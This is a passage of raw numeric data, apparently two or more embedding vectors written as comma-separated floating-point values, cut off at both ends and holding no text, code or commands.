00034584102,0.0032292039,-0.00514737,0.013269162,-0.017365728,0.0045712623,0.006249704,-0.019551042,-0.005686045,-0.0031448524,-0.010560725,-0.004376513,-0.0051863506,-0.01704331,-0.002096225,0.00018506369,0.044955574,0.0010734682,0.02412528,0.008272777,-0.0014080687,-0.0047128354,-0.00054043054,-0.009605371,0.011343522,-0.003623872,-0.027226176,-0.016382528,0.019967977,-0.0056129573,-0.0037784094,0.01030715,-0.00043688336,-0.0009749813,0.0065701986,-0.005750445,-0.007481844,-0.0072913645,-0.0040038866,-0.0032852206,-0.0064065433,-0.0035919226,-0.016979072,-0.013183532,-0.008260758,-0.013005777,-0.009284191,0.02443592,0.03472638,0.039810155,0.011941863,0.010168644,-0.017232863,0.015866088,-0.0016766705,-0.037691917,0.0037251357,-0.009539746,-0.0076950383,0.038588043,0.024396082,0.006869556,0.0018495166,-0.0047001955,-0.0042625726,0.00977577,-0.0058744242,0.014672621,0.011169072,0.0092661595,-0.023797814,0.0041395915,-0.025248809,0.023791961,-0.0013295254,0.03129198,-0.015254988,-0.012253864,0.0022400848,-0.0031172154,-0.014263358,0.019931164,-0.018054543,-0.00073468644,0.0112859905,-0.007335339,0.0013611157,0.007057735,-0.0021721937,-0.00042730026,-0.004423361,0.006579707,0.00879904,0.009302127,-0.020168785,-0.00392317,-0.0009157289,0.013849991,0.02039325,0.0028375278,-0.025964295,0.021528713,0.017660523,0.010874114,-0.0077853035,-0.008778507,-0.01755729,-0.011307481,0.0052671647,0.002472236,-0.02969074,0.0032066323,0.027027035,0.01763122,-0.015054865,-0.007837748,-0.02380774,0.005039628,-0.013532915,-0.009980786,-0.01158767,-0.01692629,0.0050648944,-0.019304406,0.014293954,0.0055463505,0.0031220478,-0.015101366,0.006666239,-0.011537275,-0.0032255165,-0.004222639,0.006392429,0.0015798832,0.0027446467,0.024303962,-0.018124983,0.012680046,-0.016708314,0.02901678,0.043872923,0.010942028,-0.003348295,0.016036762,-0.0058441735,-0.0061063296,-0.017331135,0.013509053,0.017260484,0.14121954,-0.0072469814,0.007906757,-0.0038421026,0.009481231,-0.012814825,0.005403142,-0.00048010246,0.0038506526,0.00074029126,0.01993318,-0.01597948,0.0048020924,-0.011291514,0.0042099445,0.027051093,0.014584254,-0.023412865,0.022467952,0.012312164,0.008647141,-0.014823873,-0.00861136,-0.042976156,-0.008679017,-0.068279386,0.028501807,0.027451003,0.017376436,0.02993142,0.0011210167,-0.005294495,-0.00039105918,0.015024069,-0.005906213,0.0031129348,0.0038239015,-0.016970508,0.0076739783,-0.011044934,0.025035856,-0.0013859296,-0.002708067,-0.021220306,-0.009758753,-0.009088018,-0.0024340386,-0.026633423,-0.008822672,-0.0075010746,0.013065356,0.00129691,-0.0055068936,-0.02057291,0.008673913,-0.014597841,0.008789368,0.0067325686,0.023771185,-0.007583406,0.012403737,0.0033838225,0.010703939,-0.023019226,0.009313772,0.013585593,0.0061927554,-0.0023239749,-0.0016401241,-0.007918905,0.016905788,-0.013861905,0.010068164,0.0012890748,0.011896028,0.0114322435,-0.0067363265,-0.004800692,0.00471109,-0.0006917579,-0.011303239,-0.0067013437,0.002725964,0.002866921,0.0035024092,0.005222586,-0.0013211619,0.017186303,-0.015193076,-0.013300872,-0.019715387,0.027515845,0.02793425,0.009152557,-0.015557221,-0.0027808973,0.019685782,0.009259542,-0.015524609,-0.0021268027,-0.016482554,-0.012614899,0.006387839,0.028099613,-0.0047144024,0.004863882,0.0006852028,0.0032823007,-0.014462532,-0.010499365,0.0065649715,0.022198722,-0.0015880007,0.024691803,0.0031226557,0.04473104,-0.029667726,-0.0124715,0.014826363,-0.02293189,-0.0008932999,0.013004125,0.027226146,0.032472577,0.004243704,-0.0023156141,-0.020597672,-0.0037463496,0.0055832476,-0.0064323377,-0.0019309168,-0.027679738,-0.0010752847,0.013456206,-0.009150199,0.0054142918,0.0265412,0.00008903265,0.018452346,-0.010483873,-0.01268024,-0.01804776,-0.0008336066,-0.017363207,0.015256996,-0.02776503,0.022069639,-0.01027189,0.011181842,0.001738361,0.02315396,0.010765109,-0.016557712,-0.006940752,-0.014064202,-0.00021460991,-0.014397704,0.014786368,-0.011821923,-0.0126776565,0.0074768187,-0.002239615,0.0030335383,-0.053724315,0.02611699,0.0027725722,0.0016112749,0.010372275,0.0078029544,-0.000105953826,-0.016831093,0.0018665796,0.00050630094,0.0056622433,-0.025690902,0.0157206,0.01777097,0.0226533,-0.021019563,0.010669228,0.012030777,0.011324423,-0.010518678,-0.010814444,0.040842615,0.007058906,0.007921559,-0.00012933387,-0.012569927,0.031288944,-0.012026736,0.007639713,-0.0050329897,0.012387993,-0.024134763,0.017423704,-0.033750568,0.025060859,-0.03409449,-0.03927985,-0.012017926,0.0027048644,0.026147414,-0.015619177,0.0043456918,-0.012842074,-0.003006667,-0.030530607,0.010861642,-0.005362024,0.009649446,-0.011607482,-0.01086618,-0.041961774,-0.005565371,0.008316139,-0.0058364966,-0.020287115,0.007435473,-0.009111604,0.0064427573,0.010226542,-0.009191993,-0.006227593,-0.009019642,0.020094166,-0.029912705,0.0052989614,0.010179845,-0.032684743,-0.018306252,0.016356062,0.012552819,0.004721277,0.00229553,0.013659463,0.029437441,0.021267323,-0.0053145727,0.008938613,-0.011810565,0.017807273,0.029816568,-0.007978079,-0.041888945,0.012446093,-0.0082007265,-0.018087268,-0.0063727293,-0.008010381,-0.021767223,-0.0004380443,-0.009205579,-0.030935243,-0.021082398,-0.024596648,-0.013284396,0.008197281,0.016194122,-0.014179419,0.006992159,0.020885032,0.001771226,0.02772596,-0.0023369736,-0.010517728,0.01931931,-0.0032713362,-0.004290405,0.003491597,-0.009187377,0.018447608,-0.0127541395,0.033007544,-0.0000048738366,0.013964168,-0.0024023158,-0.0030332836,0.0043941056,-0.018985959,-0.0043059248,-0.016736932,0.0013689583,-0.0047696796,-0.009064355,-0.0014249918,-0.006856842,0.025737818,0.05977451,-0.084352314,-0.005842168,0.012305816,0.0085281795,-0.03918984,0.013806751,0.016253961,-0.016413765,-0.026099894,0.0041373638,0.012877098,0.0031788643,-0.038739596,-0.013561206,0.011147767,0.00842444,0.0059831534,0.0050887675,-0.026993833,-0.009787429,0.020474792,-0.004765831,-0.0014184536,-0.014020563,-0.015749244,0.00010926685,-0.00401882,0.0073354715,-0.021104129,0.01389841,0.013415281,0.005307835,-0.008837086,0.0083615435,0.0038487278,-0.012656474,0.0031115052,0.0049606524,-0.016468989,-0.027767124,-0.018063795,-0.00016027992,-0.012895347,0.006097741,-0.00012206605,-0.010128887,0.026118968,-0.01684723,0.12912984,0.0035354965,0.0069847433,-0.0045921304,-0.0017940174,-0.014360447,-0.0020603137,0.02236274,0.007695954,0.017224673,0.0062037273,0.0034817853,0.0063936627,0.032294337,-0.013112823,-0.0068356344,-0.00740109,0.11704568,-0.009510011,0.02729739,0.012790479,0.01657923,0.0038814833,0.006324978,0.016385054,-0.078382924,0.0027026832,-0.045716174,0.002892402,-0.0020831292,-0.03930354,0.01736176,-0.020097334,-0.0006830435,-0.009334096,0.021161407,-0.006165214,-0.0038166502,-0.033476014,-0.012674126,0.015845304,0.008123724,-0.014399332,-0.009510236,-0.023614105,-0.000025980027,-0.020938095,0.011053263,0.00050680933,0.011416859,0.0025929813,-0.0026700445,0.023630263,0.005663064,0.0016164902,0.0018316949,0.0010927157,0.0012051455,-0.02910271,0.011297333,-0.010001861,0.006249794,0.0145848915,0.035266403,-0.014879689,-0.006125458,-0.007060839,0.007317799,0.01042597,0.019879559,0.022569444,0.028862733,-0.012850514,-0.0077328966,0.028981239,-0.0045101373,-0.00589288,0.0027034509,0.021129662,0.0049763396,0.038522094,0.010718554,-0.004510793,0.006306885,0.012587112,0.018120257,0.011755854,0.0009907418,-0.007964031,-0.013986275,-0.00025990684,-0.0005320262,-0.01036271,0.016839013,0.009039024,0.021914745,0.0110149635,-0.009475063,0.022709839,-0.02810064,-0.009647745,0.020297352,-0.009901487,-0.0034280256,0.003545621,0.011483852,-0.010402756,-0.042855635,0.0031996663,0.0025583552,0.00009401303,0.01721335,-0.005398841,0.01553549,-0.0011283068,-0.009654482,-0.011844056,-0.00068437925,-0.016450947,-0.0022724145,0.0054149814,-0.0032886018,-0.006918646,0.0074240835,-0.013354073,0.016205534,0.008303755,0.010581661,-0.015408517,-0.0047347606,-0.0052840174,0.006924898,0.006726553,0.055989843,0.002778787,-0.019405872,0.019579444,-0.016428286,-0.035250444,0.0011927192,0.003376528,0.01267996,0.017357301,-0.0030527955,0.005557017,-0.014819078,-0.018815251,0.0022171363],[-0.00070176454,0.013230703,-0.00044597525,-0.017576225,0.0142840445,-0.014656491,-0.02050414,0.001722118,-0.011775306,-0.013603056,-0.026833316,0.027287701,-0.014492505,-0.006190188,-0.0128952935,-0.010523517,0.015307955,-0.006407087,-0.008885242,-0.006030222,-0.0042092516,-0.0023909605,0.005200777,0.00170254,0.02292438,-0.004135254,-0.0020407557,0.0070914053,-0.00016346095,0.019238979,-0.0014515403,0.014234703,0.013066597,-0.007845193,-0.007178479,-0.01463223,-0.013687012,-0.024776196,0.004181011,0.001383908,-0.0064723883,0.010346799,0.015204252,0.0156753,-0.018506516,0.020312741,-0.010914423,0.012173882,-0.035296857,0.00004342991,0.012103639,-0.0069859787,-0.022284998,0.011640334,-0.0212086,0.025003223,0.010884044,-0.024562184,0.030685393,-0.007446973,-0.002674901,0.020806575,-0.0023921414,-0.02216285,0.004746734,-0.010467736,-0.008153771,0.008572542,-0.000043685675,-0.02813043,-0.013132202,0.004578531,0.016944647,0.009143319,0.013711104,0.0075989715,0.013397718,-0.024902958,-0.013555199,0.019981869,-0.0064494554,0.008575863,-0.0043119136,-0.009337981,0.0021295573,0.0012685749,-0.0119534265,-0.0065964595,-0.0034044406,-0.03886059,-0.0028862474,-0.005450617,0.012321342,0.022992814,-0.030813133,0.030888686,0.016152803,0.001941378,-0.0053646206,0.0019519344,-0.011073257,0.0008648522,-0.030707896,0.006822451,-0.0008376333,0.002384799,-0.0075169196,-0.010924371,-0.0066875624,0.0008481735,-0.0077033434,0.012372451,0.019534856,0.009169341,0.006251413,-0.008664731,0.0032460422,0.004894307,0.0025873492,-0.004401286,-0.008200254,0.028914044,0.022264717,0.0055861846,-0.011354199,0.0122483475,-0.039917294,0.0066291466,0.010586519,0.018655967,-0.002277706,0.014861024,0.0020237942,-0.009850146,-0.013652594,-0.0015317508,-0.0078508435,-0.011146625,0.0021786343,-0.006787566,0.005169738,-0.013803718,-0.0008588785,0.011604069,0.037481178,0.026547605,0.004237324,0.038413685,0.024086544,-0.019098725,-0.013452778,-0.00025222756,-0.002103907,-0.0073652244,-0.010090492,0.027160792,0.0123870345,-0.01212885,-0.011719834,-0.0016371866,-0.021747736,0.012423004,0.0001284699,-0.014000644,-0.034764122,-0.024654454,0.01478336,-0.01971891,-0.0022546854,0.008172597,-0.008653992,0.0025592467,0.02650408,-0.015832689,0.00857705,0.039650954,-0.009621056,-0.01831498,-0.010691752,-0.0031474703,0.02040612,0.020715963,0.0057476996,0.00924033,-0.01236293,0.007923575,0.023487685,-0.006361059,-0.022707172,-0.008476393,-0.012768345,-0.024774037,-0.020325588,-0.0037700867,0.00006236091,-0.021645956,-0.011124309,0.0823279,0.0007977618,0.011141999,-0.010817646,0.012509642,0.014454278,-0.027229303,-0.014028011,-0.011539008,-0.01433468,-0.0056158155,0.02393168,0.00094095373,-0.00033428503,-0.0052901465,-0.02381141,0.014173337,0.0048682173,-0.056191143,0.008438585,-0.000009780222,-0.004242642,0.00021330368,-0.006975197,0.00978,0.021204034,-0.024077503,0.0006197304,-0.02275606,0.005974934,0.0011075115,0.017353436,-0.027578006,0.020226985,-0.004045822,-0.024437523,-0.018018449,0.007045515,-0.018143335,0.010937294,-0.015810879,-0.002021151,0.005736506,-0.0065643815,-0.0008362117,0.026089907,0.038751543,-0.016409589,-0.0014110805,0.01798449,0.017050283,-0.011267792,0.028577106,0.029067691,-0.0010631725,0.021940995,0.02879144,-0.007177642,-0.006959152,0.008671895,-0.005439215,-0.020707075,0.0027946872,0.0025900444,0.023389935,-0.0053354865,0.00258082,0.039734572,0.013380051,0.011630341,-0.035647072,-0.001423442,-0.015344895,-0.009962227,0.016578324,0.0032807938,-0.00424915,-0.0051531345,-0.003331901,0.014820134,0.0049894443,-0.00947023,-0.00067259127,0.0009869139,0.008349307,-0.0009891742,-0.014035823,-0.025352754,0.0033906882,-0.0021115765,-0.0031567668,0.02005206,-0.017508745,0.0077198558,-0.01848136,0.011522812,-0.00248677,0.0009056688,-0.011485396,-0.01036755,-0.0071518025,0.003923499,-0.015991071,-0.0010788874,-0.016887935,0.043557465,0.013487121,-0.0029777242,-0.0072795707,0.0064515816,0.03968636,-0.016539792,0.023779292,-0.02324475,-0.020896092,-0.03925836,-0.008012696,0.014451715,-0.0030393673,-0.010117418,-0.013973727,-0.0062072896,0.002587107,0.020924922,-0.027825983,-0.010342659,-0.036906213,-0.009241122,-0.0035350735,0.0028482086,-0.0073444042,0.007879355,0.014961232,-0.012373658,0.020395616,0.0012312741,0.016399387,-0.017784394,0.03152226,-0.021313353,0.016654106,0.014629999,0.015738294,-0.0306966,-0.008579895,0.0008044629,0.020488355,0.0004164392,-0.025844697,-0.002273723,0.00518898,0.022425221,-0.00072422373,-0.0011654126,0.00051849283,0.0025108845,-0.020066231,-0.032694716,0.018181741,-0.031472098,-0.016901262,0.0061229994,-0.01690835,0.0007046716,0.006503971,-0.023765841,0.0035915275,0.07199663,-0.012716208,-0.0030356778,0.0047362796,-0.015050252,0.003361799,0.034807026,0.0013478178,0.008483049,-0.0028972954,-0.009028734,-0.0072102295,0.022516696,0.0025456895,-0.0061033145,0.0309866,-0.006700722,-0.011023349,-0.01619972,-0.004198534,0.022746697,0.0013293845,-0.0016039744,0.03567562,0.009013444,-0.0060914205,-0.010331611,-0.017539542,0.002647256,-0.011927606,-0.006797883,0.00045064662,0.0055337506,-0.0014534689,-0.034345962,0.015825314,0.0070902696,-0.0040146955,-0.004917859,-0.023995604,0.002504201,0.0074592424,0.005671177,-0.008093723,-0.015083358,0.01665919,-0.00045340104,-0.003915408,-0.024217758,-0.002328521,0.005077563,0.020926926,-0.014121855,0.021173464,-0.0023953638,0.015350074,0.024647271,-0.033955038,0.017718751,0.04278819,0.009640242,0.01074713,-0.0009178482,-0.005832913,-0.016895507,0.03811147,-0.012866668,-0.028190946,0.000012757586,-0.018597363,-0.005463972,0.0047896598,0.001334051,0.0029979148,-0.014644222,0.017031072,0.0036258928,-0.0023536503,-0.0059004123,0.011991383,-0.0025313632,0.0057153003,0.016604334,-0.011184571,-0.007441578,-0.008914077,0.008617111,0.017813465,0.016499054,0.01042642,-0.0031550748,0.011394974,0.0015470115,0.0032169106,0.034072608,0.02431679,0.017877256,0.010820773,-0.015330608,-0.0121789,0.006449838,-0.008643284,-0.009570351,0.003489811,-0.004995343,0.010570938,0.009935659,-0.010550471,0.005717796,0.024286853,-0.01520807,-0.0027831641,0.012865282,-0.012945477,0.013512683,-0.02109778,-0.013949613,-0.014589372,0.008108144,-0.012572005,0.028560154,-0.0071419613,0.015436802,-0.0019660152,-0.023237547,0.003337578,0.00016608422,-0.0023801762,-0.006172429,0.035998374,-0.0019699044,0.022652999,0.0067006866,-0.03304652,0.016347582,-0.02362645,-0.023782413,-0.034956746,0.022873275,0.01128802,0.022265794,0.026662765,0.055279486,-0.007122883,0.0037387435,0.0044859033,0.036715,0.008777109,-0.021429494,-0.014880019,-0.0092852805,0.011470682,-0.006845497,-0.025196854,-0.002244567,0.0014985993,0.0150109,-0.024310574,-0.004803585,0.010678271,0.008446804,-0.024355844,0.02031474,0.019420281,-0.008404825,0.015610487,0.024018932,0.03142748,-0.02161555,-0.017967911,-0.0021068847,-0.0007349412,-0.007597544,-0.0014544111,0.03155605,-0.028516537,-0.0049313265,-0.0011118677,0.025030801,0.014064211,0.012157926,-0.03290347,-0.012597551,-0.0027654828,0.007064373,-0.009691346,-0.0007200186,0.019777937,-0.01653171,-0.02235792,-0.024406103,-0.016366282,0.014292289,0.0076804445,-0.00086280855,-0.016227353,-0.0023240866,-0.015453771,-0.007988581,0.004041458,-0.0066436133,0.024572117,0.019189028,0.021935934,-0.0042316117,-0.005252411,0.02112875,-0.021481076,0.011268669,0.0017870852,-0.0024174324,-0.00019480739,-0.014136811,0.006871812,0.018505814,0.015015562,0.007899688,0.000015204121,0.03874677,0.015391567,0.01762844,-0.012211134,0.0041065346,0.006747257,0.008782455,0.0041088774,0.005559327,-0.02933454,-0.0026110166,-0.0006856363,-0.011189559,0.0012012506,0.0036144333,-0.0052592405,0.0007737489,-0.012511117,-0.03363039,0.0056146784,0.0009772422,-0.010261796,-0.0057142433,0.01774001,0.008642808,-0.028292445,0.008118619,0.013644684,-0.01777306,-0.0006308818,0.010144091,-0.0036963255,-0.00094515184,0.009816982,-0.02307339,-0.0034629074,-0.0027924066,-0.0051055416,-0.0027170351,0.010560883,-0.017985795,0.012950712,0.012504592,0.00779229,0.0035776882,0.0016825106,-0.02615982,-0.0044177203,0.0071068034,-0.017961578,0.0030798211,-0.034532443,0.016973397,-0.012255479,-0.0072416645,0.032111276,0.00950222,-0.005709808,-0.022965392,0.006706944,-0.05269932,-0.00079647446,-0.007798153,-0.00071006536,0.0034404534,0.052275486,0.025835868,0.00007835139,-0.0028259812,0.002497523,-0.009431565,0.006830732,-0.0069106296,-0.004955203,0.018809248,-0.019430427,-0.03217918,-0.00039964714,-0.022927497,-0.009509705,-0.010827677,0.03828905,0.0115673635,-0.0013248094,0.006545462,-0.024851745,-0.012490613,-0.008134428,-0.014058403,-0.031756237,-0.005659482,0.020320633,-0.026395248,0.018484598,-0.0133157605,-0.009203396,-0.011984691,-0.019120714,-0.022928951,0.0035358416,0.014104034,-0.02114478,-0.0032004458,0.00073563604,-0.018579083,0.024346005,-0.02096579,0.016214723,0.018475484,0.043014094,0.015807344,0.022558553,-0.014904924,0.007575351,-0.009260418,0.01643869,-0.0054255524,0.03845808,0.007975831,0.0057293554,-0.009593752,0.015089057,-0.0026134988,-0.03180176,0.018656846,0.018336497,0.045984413,0.005937778,0.019423576,0.004004087,0.020227375,0.01163768,0.026882596,-0.0020494866,0.008701466,-0.005557953,0.011274658,0.029960904,-0.017088123,0.008365783,-0.026707545,-0.015931161,-0.013506109,0.031905804,0.015368584,0.009700231,-0.0023779506,0.009028548,0.00013574609,0.019865042,-0.0058340314,-0.010294444,-0.0064535486,-0.01616455,-0.014651214,-0.04061344,-0.0011223095,-0.028313749,-0.0056167683,0.016732177,-0.0010223384,-0.008321404,0.0067085135,-0.009678615,0.022838924,0.00042887143,-0.034762327,-0.0226591,-0.0054918816,0.022763398,-0.0061620898,0.004413729,0.013798837,-0.007648846,0.0024620455,0.01604321,-0.025942553,-0.01372381,-0.017906923,-0.0021426016,0.011322601,0.001266496,0.028907876,-0.0013070089,-0.018126797,-0.0004620871,-0.0047147465,-0.00055482285,0.005058559,0.012145354,0.013313936,-0.0018098225,0.020017745,0.0023388132,-0.020235715,-0.00998424,0.0067683677,-0.04953753,-0.009052717,-0.011726074,0.018075904,-0.02378387,0.016809937,-0.009478521,0.037579596,0.03075427,0.0007845589,0.008026707,-0.006945112,-0.009168425,0.028788427,0.025854569,0.0055898177,-0.031590838,-0.0078826565,-0.011766932,-0.009549297,-0.0114834905,-0.014231911,-0.010397436,-0.014510008,-0.014978692,0.0044670836,-0.032952055,-0.0061063245,-0.009133834,-0.040357657,0.022757746,-0.0053363526,0.012932512,0.0058900355,-0.0043246774,0.005350733,-0.010692888,-0.0011835176,-0.04379536,-0.017855547,0.031149412,-0.028783418,0.011515139,0.00089914864,-0.045569096,-0.037881836,-0.019136127,0.0024124475,-0.021836692,0.019129714,0.0139722675,-0.022978961,-0.019898329,0.022325493,-0.008931201,0.0072883116,-0.019965274,-0.017214183,0.011837319,-0.014224896,-0.000061035094,0.0008582611,-0.012217742,0.0022821121,0.02204034,-0.018047959,0.022108082,0.0022602722,0.008345975,-0.016374085,0.012632295,-0.012262236,-0.02436469,0.014959393,-0.006733652,-0.009534562,0.017901862,0.009369573,0.030740617,-0.0031387673,-0.03395374,-0.024168126,-0.01688319,0.015178976,0.004992604,0.009490043,0.0063638394,0.009500801,-0.0025761495,0.004676806,0.019893615,0.0056892983,0.011009613,0.026742255,-0.00439252,-0.035384517,-0.0039096745,-0.0066460576,-0.01788519,-0.0084970305,0.027387196,-0.01064335,0.016214952,0.018944247,-0.0028823041,-0.0036547594,0.025225194,-0.009960983,-0.0088705905,0.014241219,0.013705382,-0.004765086,0.009741727,0.043515522,-0.022609413,-0.008419071,-0.022358725,0.0049671335,0.023272762,-0.017999938,0.0001879657,-0.014022807,-0.008351553,-0.00011050682,-0.009140972,-0.005938904,-0.00042466808,0.0021033282,-0.004576925,0.0010174576,0.017001744,-0.00034144806,-0.0022144923,0.012515921,-0.020191692,0.004624175,0.0097570205,-0.005336464,0.0029715456,0.02228338,-0.0052748383,-0.01658856,0.009807978,0.0046574776,0.020181142,0.035860565,-0.008301054,-0.008293358,-0.022132669,-0.010102246,0.012869368,0.014976878,-0.0129323425,-0.035497658,0.0075984835,0.018221606,0.005688327,0.0036968898,-0.012262782,-0.061971772,0.018071517,-0.003809832,-0.022105275,0.023539709,0.026509825,0.00028137062,0.00033147438,0.03595912,-0.023049414,0.0019176798,-0.018555405,0.0118509,0.0017440136,0.013579516,-0.023573885,-0.016531514,-0.022703122,0.028058745,-0.0019444413,-0.011317632,0.010159815,0.0043507074,0.0072890646,0.04273103,-0.0072760256,0.0022797908,-0.014425012,-0.024757648,0.0018159235,0.012675918,-0.008406454,-0.0090753045,-0.0045973496,-0.012842184,0.0065716086,0.011265491,-0.0030613833,-0.009423534,-0.007826035,-0.0065609184,-0.01684324,-0.0012018111,0.039097205,-0.005721179,-0.024811534,0.015670259,-0.009869792,0.011989751,-0.011490996,0.0058699544,0.003941831,0.003232272,0.008238544,-0.019594958,0.039333742,-0.003463207,0.0025422955,0.032520838,0.00009819569,0.00019581086,-0.0060098073,0.019432167,0.0055468185,-0.021724295,0.0014780997,0.002545092,0.021094956,-0.00837055,-0.008442956,-0.0061377683,-0.0109066395,-0.018448986,-0.002023709,-0.02676273,0.017961977,-0.0055316617,-0.0084842155,0.0031759182,-0.0133842435,-0.016565232,0.03215772,-0.035263095,0.0080964295,-0.024712253,0.0015131643,-0.0028257624,-0.010210121,-0.005122388,-0.0013152278,-0.010991095,0.012022904,0.011317931,0.022938326,0.0061254296,0.025924861,-0.012456371,-0.0016074261,-0.0061680693,0.005413262,0.029551353,0.0062901336,0.0009391832,0.05876674,0.022966197,0.001623591,0.002479302,0.00008498,0.024360843,0.022420218,-0.004992551,-0.009049508,-0.0029015716,0.007610201,0.008053437,0.001487324,-0.0044699465,0.023617929,0.014405284,0.02259427,-0.0047159744,-0.0102798585,0.0172124,0.009126583,0.012222291,-0.012257259,0.01581457,0.011601441,-0.010015462,-0.00083599426,0.0010857501,0.0136860395,0.006216574,0.0019302128,0.014929297,-0.0068303533,-0.010851991,-0.02666521,-0.004729505,0.009748553,-0.009859365,-0.0018357947,-0.003875184,0.0004694648,0.006464387,-0.011188916,-0.0082546845,0.007070974,0.020164361,0.0035611868,-0.006263014,0.012691243,0.005666837,0.0124059385,0.0037638631,-0.0028458762,-0.018387042,-0.021853125,0.003321301,-0.009092528,-0.01339809,-0.021699876,-0.0097498195,0.0034176386,-0.035312127,0.007992118,-0.0072000846,-0.019409064,-0.014401828,-0.00019080579,0.004937339,0.016308798,-0.006004876,0.017710749,0.006068568,-0.035347823,0.0028229211,0.011228896,-0.009734232,0.017493581,0.005195539,0.018685233,0.011721182,-0.004801231,0.017159283,0.00071203156,0.000022390257,-0.010638049,-0.0098023,-0.025809532,-0.0024969145,0.0013804918,0.015668457,-0.009840597,-0.015538366,0.050334834,-0.0072649955,0.019564895,0.008055949,-0.011173785,0.010739551,0.008625739,0.0066005676,0.008737817,-0.025053246,0.025062755,0.027260307,-0.04350758,-0.006919775,0.002768587,-0.0006116547,-0.009561682,-0.01087708,0.007386054,-0.010696401,-0.009281267,-0.039797384,0.019231534,0.033075046,-0.011197701,-0.0018427186,0.013668828,0.010689826,-0.00097308966,-0.021870872,-0.013606075,-0.011356534,0.027541382,-0.0059583895,-0.0195024,0.028693905,-0.006426975,0.022981707,0.028111652,-0.018454745,-0.011521439,0.0052867364,-0.0044324123,-0.022103969,0.01805549,0.0033716667,0.014685307,0.00089697813,-0.007576215,-0.0201101,0.025751974,0.017917907,-0.0130806565,0.0019827804,0.008215119,0.024673622,0.002956773,0.029126054,0.00017232688,-0.005703396,-0.007566097,-0.03401593,0.009980888,0.002475939,0.009622883,-0.019147513,-0.0010354546,-0.011581676,-0.014682389,-0.014998888,0.0029272349,0.0021113215,0.0069811507,0.022354493,-0.012569642,-0.0021241745,0.00026519777,0.012006961,0.009708384,-0.0070535727,0.009969444,-0.021376528,0.0017215842,0.0012362734,0.020836946,0.0072592944,0.011755973,-0.0006309302,-0.017294869,0.014761645,0.014910526,-0.002044753,-0.0049452716,0.005653179,-0.006340077,-0.024955578,-0.021299941,0.0005871489,0.0005759717,0.022484152,-0.012525843,-0.014174123,0.0005512981,-0.012384664,0.002806503,0.093336485,-0.027718753,-0.0023392779,0.008286977,0.008954108,-0.013057554,0.029318929,0.010234224,-0.013866493,-0.011853927,-0.038366303,-0.0066995965,-0.014809763,-0.010759356,0.010073687,-0.01602834,-0.012271336,0.023211543,0.00438296,0.005490624,0.0069217966,0.006061048,0.007925182,0.00042085478,0.029410506,0.0023213534,0.013862183,-0.023565501,-0.0020668553,0.019133193,0.009989921,-0.007648233,0.018878274,0.021618588,-0.012759666,0.003786863,-0.0022944116,-0.0022266929,-0.015769722,0.013575901,0.013053496,-0.007377418,0.046453428,-0.011729864,0.0088614235,-0.008266256,-0.0070500546,0.013329541,-0.023460412,-0.022561142,-0.0034987722,-0.004200971,-0.0093438225,0.00925708,-0.016267452,-0.012045966,-0.012060275,0.031833928,0.017531985,-0.008649169,-0.006231434,0.039525077,-0.014480566,-0.018875813,-0.02922534,0.0137457345,0.0047397246,-0.0063089747,0.006619501,-0.015764289,0.0053832084,0.0021382698,0.0066271126,0.021592757,-0.016002472,0.011505305,0.018702237,0.0095883375,-0.009994863,-0.017923357,-0.0102508245,0.0042581516,0.03455127,0.0026667195,-0.012672328,0.014342405,0.010102261,0.017591214,0.037478298,0.009160521,0.01737411,0.0006779165,-0.005652462,0.008756327,0.024277458,0.034720145,-0.0018611135,0.01339292,-0.022293981,0.033890978,0.000007457363,0.0014788868,0.01593389,-0.022736793,0.015443546,0.007802847,-0.0010244239,-0.014899302,0.0014090557,0.035202984,0.005443113,0.0013626302,0.0051965844,-0.0053853737,-0.0010370322,-0.024023743,-0.007437299,-0.017038511,-0.009160229,0.0060735056,0.0043234327,-0.0039452785,-0.012814163,-0.062466253,-0.009978132,0.122708246,-0.005140274,-0.008438743,0.018490631,0.002365292,-0.0047140964,-0.1077358,0.0075322357,0.014008232,0.014858843,-0.021822816,-0.011742524,-0.024120402,0.016800761,0.00021293313,0.0076049743,0.00054889853,-0.029067928,0.013628548,-0.013094405,-0.009490523,0.014308963,-0.00054629915,0.021097405,-0.045124684,-0.017830493,0.01939148,-0.019676264,-0.0127651915,-0.021652587,0.0046941945,0.015183713,0.009399444,-0.004637121,-0.005934102,0.000961057,0.030946959,-0.008826657,-0.029582074,-0.002151394,0.040709734,0.00006348163,-0.015872192,-0.031188613,-0.12989277,0.0039130524,-0.01972395,-0.038981196,0.004196874,-0.021098377,0.0026773238,0.0009451542,0.014357791,-0.018178506,-0.00087885,0.035453472,-0.029998727,-0.00008611026,-0.021778442,-0.017487414,0.0108544305,0.0042763534,0.008568166,0.0065230723,-0.0030419354,0.01784862,-0.02099604,-0.010524333,0.0023113897,0.017514136,0.0040016584,0.019296741,0.0015703455,-0.0036533312,-0.0077321064,0.012720921,-0.024761891,0.024776548,-0.023001842,-0.0076599023,0.0027247507,0.007824771,-0.008910419,0.024206294,0.012136374,0.0163613,-0.01641508,0.0022674913,-0.001031824,0.016138341,0.004460611,0.011328634,0.021234294,0.006796569,0.009648072,0.0017519692,-0.035435494,0.0074331453,0.0068089734,-0.012798425,-0.0040358496,-0.029294822,-0.01591986,-0.00045021254,-0.0042834184,-0.013352256,-0.016052235,-0.008740777,0.043239776,0.006426249,0.008968075,-0.02987376,-0.0029402708,-0.004527703,-0.0069611007,-0.0012139541,0.020367213,-0.025441652,0.026813827,0.01568482,0.008790757,0.008194983,0.01677123,-0.017035306,0.033066798,-0.00048230772,0.003679189,-0.03039889,-0.0069915513,-0.013286823,-0.017825365,0.014817598,-0.0009840466,0.016912814,0.028621132,0.0062265377,0.014270075,-0.015426367,0.025132881,-0.0006306708,0.025740996,-0.016443612,-0.037526835,0.023627546,-0.0070382785,-0.015188286,-0.00068725715,0.009182801,-0.01197608,-0.005675524,0.014158437,-0.014573263,-0.037205853,0.0029879801,-0.018550394,-0.013705052,0.025181415,-0.0032636437,-0.013923447,0.0019811932,0.007112777,-0.0029508478,0.008296565,-0.019063953,-0.038065493,0.0057657524,-0.014064196,-0.004784024,0.009872581,-0.0062137847,-0.02121296,-0.005317241,-0.015739644,0.015772384,-0.019279007,0.008771994,0.004686186,0.016623575,-0.03056863,-0.01755921,-0.008793294,0.009285867,-0.021676235,-0.004825054,-0.007925419,0.008957556,-0.016483793,-0.017274877,-0.00085605145,-0.0040258504,0.023364613,-0.0151382545,0.030579582,0.010811876,0.0069874846,0.01867366,-0.027224373,-0.017480515,0.014339308,0.067581534,-0.019745726,-0.00583723,0.018719377,0.01858211,0.010621001,0.0061472235,-0.025362518,-0.02721613,-0.0128994025,-0.009718929,-0.00518113